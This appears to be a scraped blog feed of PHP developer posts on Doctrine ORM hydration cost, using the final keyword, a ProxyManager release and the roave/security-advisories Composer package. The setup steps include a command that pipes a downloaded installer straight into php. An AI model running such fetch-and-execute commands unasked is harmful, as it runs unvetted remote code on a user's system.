| userId | user Username | social Account Id | social Account Username | social Account Type | session Id | session Expires On |
|---|---|---|---|---|---|---|
| 1 | [email protected] | 20 | ocramius | ocramius-macbook | 2015-04-20 22:08:56 | |
| 1 | [email protected] | 21 | @ocramius | ocramius-macbook | 2015-04-20 22:08:56 | |
| 1 | [email protected] | 22 | ocramiusaethril | Last.fm | ocramius-macbook | 2015-04-20 22:08:56 |
| 1 | [email protected] | 20 | ocramius | ocramius-android | 2015-04-20 22:08:56 | |
| 1 | [email protected] | 21 | @ocramius | ocramius-android | 2015-04-20 22:08:56 | |
| 1 | [email protected] | 22 | ocramiusaethril | Last.fm | ocramius-android | 2015-04-20 22:08:56 |
| 2 | [email protected] | NULL |
NULL |
NULL |
NULL |
NULL |
| 3 | [email protected] | 85 | awesomegrandma | home-pc | 2015-04-15 10:05:31 |
If you try to re-normalize this resultset, you can actually see how many useless de-duplication operation have to happen.
That is because the User [email protected] has multiple active sessions on
multiple devices, as well as multiple social accounts.
SLOW!
The hydration operations on this resultset are O(n * m * q), which I'm going to simply
generalize as O(n ^ m), with n being the amount of results, and m
being the amount of joined tables.
Here is a graphical representation of O(n ^ m):
Yes, it is bad.
O(n ^ m) hydration?
O(n ^ m) can be avoided with some very simple, yet effective approaches.
No, it's not "don't use an ORM", you muppet.
one-to-many and many-to-many associationsCollection valued associations are as useful as problematic, as you never know how much data you are going to load.
Unless you use fetch="EXTRA_LAZY" and Doctrine\Common\Collections\Collection#slice()
wisely, you will probably make your app crash if you initialize a very large collection of associated objects.
Therefore, the simplest yet most limiting advice is to avoid collection-valued associations whenever they are not strictly necessary.
Additionally, reduce the amount of bi-directional associations to the strict necessary.
After all, code that is not required should not be written in first place.
The second approach is simpler, and allows us to exploit how the ORM's UnitOfWork is working
internally.
In fact, we can simply split hydration for different associations into different queries, or multiple steps:
SELECT
u.id AS userId,
u.username AS userUsername,
s.id AS socialAccountId,
s.username AS socialAccountUsername,
s.type AS socialAccountType
FROM
user u
LEFT JOIN
socialAccount s
ON s.userId = u.id
We already know this query: hydration for it is O(n * m), but that's the best we can do,
regardless of how we code it.
SELECT
u.id AS userId,
u.username AS userUsername,
s.id AS sessionId,
s.expiresOn AS sessionExpiresOn,
FROM
user u
LEFT JOIN
session s
ON s.userId = u.id
This query is another O(n * m) hydration one, but we are now only loading the user sessions
in the resultsets, avoiding duplicate results overall.
By re-fetching the same users, we are telling the ORM to re-hydrate those objects (which are now in memory,
stored in the UnitOfWork): that fills the User#$sessions collections.
Also, please note that we could have used a JOIN instead of a LEFT JOIN, but that
would have triggered lazy-loading on the sessions for the [email protected] User
Additionally, we could also skip the userUsername field from the results, as it already is in memory and well known.
SOLUTION:
We now reduced the hydration complexity from O(n ^ m) to O(n * m * k), with
n being the amount of User instances, m being the amount of associated
to-many results, and k being the amount of associations that we want to hydrate.
Let's get more specific and code the various queries represented above in DQL.
Here is the O(n ^ m) query (in this case, O(n ^ 3)):
return $entityManager
->createQuery('
SELECT
user, socialAccounts, sessions
FROM
User user
LEFT JOIN
user.socialAccounts socialAccounts
LEFT JOIN
user.sessions sessions
')
->getResult();
This is how you'd code the multi-step hydration approach:
$users = $entityManager
->createQuery('
SELECT
user, socialAccounts
FROM
User user
LEFT JOIN
user.socialAccounts socialAccounts
')
->getResult();
$entityManager
->createQuery('
SELECT PARTIAL
user.{id}, sessions
FROM
User user
LEFT JOIN
user.sessions sessions
')
->getResult(); // result is discarded (this is just re-hydrating the collections)
return $users;
I'd also add that this is the only legitimate use-case for partial hydration that I ever had, but it's a personal opinion/feeling.
As you may have noticed, all this overhead is caused by normalizing de-normalized data coming from the DB.
Other solutions that we may work on in the future include:
Just so you stop thinking that I pulled out all these thought out of thin air, here is a repository with actual code examples that you can run, measure, compare and patch yourself:
Give it a spin and see the results for yourself!
]]>final, if they implement an interface,
and no other public methods are defined
In the last month, I had a few discussions about the usage of the final marker on PHP classes.
The pattern is recurrent:
finalfinal limits flexibility
It is therefore clear that coders need a better explanation of when to use final,
and when to avoid it.
There are many other articles about the subject, but this is mainly thought as a "quick reference" for those that will ask me the same questions in future.
final should be used whenever possible.
final?
There are numerous reasons to mark a class as final: I will list and describe those that are
most relevant in my opinion.
Developers have the bad habit of fixing problems by providing specific subclasses of an existing (not adequate) solution. You probably saw it yourself with examples like following:
<?php
class Db { /* ... */ }
class Core extends Db { /* ... */ }
class User extends Core { /* ... */ }
class Admin extends User { /* ... */ }
class Bot extends Admin { /* ... */ }
class BotThatDoesSpecialThings extends Bot { /* ... */ }
class PatchedBot extends BotThatDoesSpecialThings { /* ... */ }
This is, without any doubts, how you should NOT design your code.
The approach described above is usually adopted by developers who confuse OOP with "a way of solving problems via inheritance" ("inheritance-oriented-programming", maybe?).
In general, preventing inheritance in a forceful way (by default) has the nice advantage of making developers think more about composition.
There will be less stuffing functionality in existing code via inheritance, which, in my opinion, is a symptom of haste combined with feature creep.
Take the following naive example:
<?php
class RegistrationService implements RegistrationServiceInterface
{
public function registerUser(/* ... */) { /* ... */ }
}
class EmailingRegistrationService extends RegistrationService
{
public function registerUser(/* ... */)
{
$user = parent::registerUser(/* ... */);
$this->sendTheRegistrationMail($user);
return $user;
}
// ...
}
By making the RegistrationService final, the idea behind
EmailingRegistrationService being a child-class of it is denied upfront, and silly mistakes such
as the previously shown one are easily avoided:
<?php
final class EmailingRegistrationService implements RegistrationServiceInterface
{
public function __construct(RegistrationServiceInterface $mainRegistrationService)
{
$this->mainRegistrationService = $mainRegistrationService;
}
public function registerUser(/* ... */)
{
$user = $this->mainRegistrationService->registerUser(/* ... */);
$this->sendTheRegistrationMail($user);
return $user;
}
// ...
}
Developers tend to use inheritance to add accessors and additional API to existing classes:
<?php
class RegistrationService implements RegistrationServiceInterface
{
protected $db;
public function __construct(DbConnectionInterface $db)
{
$this->db = $db;
}
public function registerUser(/* ... */)
{
// ...
$this->db->insert($userData);
// ...
}
}
class SwitchableDbRegistrationService extends RegistrationService
{
public function setDb(DbConnectionInterface $db)
{
$this->db = $db;
}
}
This example shows a set of flaws in the thought-process that led to the
SwitchableDbRegistrationService:
setDb method is used to change the DbConnectionInterface at runtime, which seems
to hide a different problem being solved: maybe we need a MasterSlaveConnection instead?
setDb method is not covered by the RegistrationServiceInterface, therefore
we can only use it when we strictly couple our code with the SwitchableDbRegistrationService,
which defeats the purpose of the contract itself in some contexts.
setDb method changes dependencies at runtime, and that may not be supported
by the RegistrationService logic, and may as well lead to bugs.
setDb method was introduced because of a bug in the original implementation: why
was the fix provided this way? Is it an actual fix or does it only fix a symptom?
There are more issues with the setDb example, but these are the most relevant ones for our purpose
of explaining why final would have prevented this sort of situation upfront.
Since classes with a lot of public methods are very likely to break the SRP, it is often true that a developer will want to override specific API of those classes.
Starting to make every new implementation final forces the developer to think about new APIs upfront,
and about keeping them as small as possible.
final class can always be made extensible
Coding a new class as final also means that you can make it extensible at any point in time (if really
required).
No drawbacks, but you will have to explain your reasoning for such change to yourself and other members in your team, and that discussion may lead to better solutions before anything gets merged.
extends breaks encapsulation
Unless the author of a class specifically designed it for extension, then you should consider it final
even if it isn't.
Extending a class breaks encapsulation, and can lead to unforeseen consequences and/or
BC breaks: think twice before using the extends keyword,
or better, make your classes final and avoid others from having to think about it.
One argument that I always have to counter is that final reduces flexibility of use of a codebase.
My counter-argument is very simple: you don't need that flexibility.
Why do you need it in first place? Why can't you write your own customized implementation of a contract? Why can't you use composition? Did you carefully think about the problem?
If you still need to remove the final keyword from an implementation, then there may be some other
sort of code-smell involved.
Once you made a class final, you can change it as much as it pleases you.
Since encapsulation is guaranteed to be maintained, the only thing that you have to care about is that the public API.
Now you are free to rewrite everything, as many times as you want.
final:Final classes only work effectively under following assumptions:
If one of these two pre-conditions is missing, then you will likely reach a point in time when you will make the class extensible, as your code is not truly relying on abstractions.
An exception can be made if a particular class represents a set of constraints or concepts that are totally
immutable, inflexible and global to an entire system.
A good example is a mathematical operation: $calculator->sum($a, $b) will unlikely change over time.
In these cases, it is safe to assume that we can use the final keyword without an abstraction to
rely on first.
Another case where you do not want to use the final keyword is on existing classes: that can only
be done if you follow semver and you bump the major version
for the affected codebase.
After having read this article, consider going back to your code, and if you never did so,
adding your first final marker to a class that you are planning to implement.
You will see the rest just getting in place as expected.
]]>
Today I finally released version 1.0.0 of the ProxyManager
ProxyManager 1.x will be a maintenance-release only:
No features are going to be added to ProxyManager 1.x: the current master branch will instead
become the development branch for version 2.0.0.
ProxyManager 2.0.0 has following main aims:
Doctrine\Common\Proxy\AbstractProxyFactory
to improve doctrine proxy logic in next generation data mappers
It wouldn't be a good 1.0.0 release without thanking all the contributors that helped with the project, by providing patches, bug reports and their useful insights to the project. Here are the most notable ones:
]]>Since it's almost christmas, it's also time to release a new project!
The Roave Team is pleased to announce the release of roave/security-advisories, a package that keeps known security issues out of your project.
Before telling you more, go grab it:
mkdir roave-security-advisories-test
cd roave-security-advisories-test
curl -sS https://getcomposer.org/installer | php --
./composer.phar require roave/security-advisories:dev-master
Hold on: I will tell you what to do with it in a few.
roave/security-advisories is a composer package that prevents installation of packages with known security issues.
Last year, Fabien Potencier announced the security.sensiolabs.org project. This october, he announced again that the project was being moved to the open-source FriendsOfPHP organization.
While I like the idea of integrating security checks with my
CI, I don't like the fact that it is possible to install
and run harmful software before those checks.
I also don't want to install and run an additional CLI tool for something that composer can provide directly.
That's why I had the idea of just compiling a list of conflict versions from
into a composer
metapackage:
This has various advantages:
Now that you installed roave/security-advisories, you can try out how it works:
cd roave-security-advisories-test
./composer.phar require symfony/symfony:2.5.2 # this will fail
./composer.phar require zendframework/zendframework:2.3.1 # this will fail
./composer.phar require symfony/symfony:~2.6 # works!
./composer.phar require zendframework/zendframework:~2.3 # works!
Simple enough!
Please just note that this only works when adding new dependencies or when running composer update:
security issues in your composer.lock cannot be checked with this technique.
Because of how composer dependency resolution works, it is not possible to have more than one version of
roave/security-advisories other than dev-master. More about this is on the
project page